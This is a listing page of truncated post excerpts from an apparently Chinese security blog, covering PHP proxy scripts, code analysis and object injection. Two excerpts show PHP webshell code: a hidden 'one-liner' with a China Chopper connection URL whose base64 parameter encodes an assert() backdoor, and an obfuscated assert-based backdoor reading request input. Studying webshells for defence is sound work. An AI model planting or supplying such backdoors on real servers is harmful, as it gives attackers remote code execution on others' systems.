2024-12-23 厉飞雨 阅读(361) 评论(0) 赞(13)

<p><img src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnP...

2024-12-23 厉飞雨 阅读(180) 评论(0) 赞(20)

<p>[callout class=&quot;info&quot; title=&quot;&quot;]现代项目的开发，需要掌握多种技术。互联网项目，需要用到后端开发、前端开发、界面设计、产品设计、数据库、各种移动客户端、三屏兼容、restFul API设计和OAuth等等，比较前卫的项目，还会用到Single Page Appl...

2024-12-23 厉飞雨 阅读(213) 评论(0) 赞(11)

<p>[sourcecode language=&quot;python&quot;]<br /> &lt;?php<br /> // 要访问的目标页面<br /> $url = &quot;http://httpbin.org/ip&quot;;<br /> $urls = &...

2024-12-23 厉飞雨 阅读(347) 评论(0) 赞(14)

<p><img src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnP...

2024-12-23 厉飞雨 阅读(229) 评论(0) 赞(18)

<p><img src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnP...

2024-12-23 厉飞雨 阅读(283) 评论(0) 赞(19)

<p>PHP一句话隐蔽代码附加链接</p> <p>PHP一句话代码</p> <p>菜刀链接地址:（也是链接地址）</p> <p>http://localhost:8080/wamp.php?bast=YXNzZXJ0KCRfUkVRVUVTVFsnc2InXSk=&amp;cmd=ass...

2024-12-23 厉飞雨 阅读(212) 评论(0) 赞(11)

<h1>0x00 PHP扩展进行代码分析（动态分析）</h1> <hr /> <h3>一.基础环境</h3> <p>[sourcecode language=&quot;plain&quot;]<br /> #!bash<br /> apt-get install p...

2024-12-23 厉飞雨 阅读(206) 评论(0) 赞(11)

<pre><code>&lt;?php if(isset($_REQUEST['hello'])){ $i[0] = 'asse'.'rt'; $array[] = $i; $key=str_replace(&quot;yBZ&quot;,&quot;&quo...

2024-12-23 厉飞雨 阅读(297) 评论(0) 赞(13)

<h1>0x00 背景</h1> <hr /> <p>原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/</p> <p>php对象注入是一个非常常见的漏洞，这个类型的漏洞虽然有些难以利用，但仍旧非常危险，为了理解这...

2024-12-23 厉飞雨 阅读(322) 评论(0) 赞(15)

<p><img src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnP...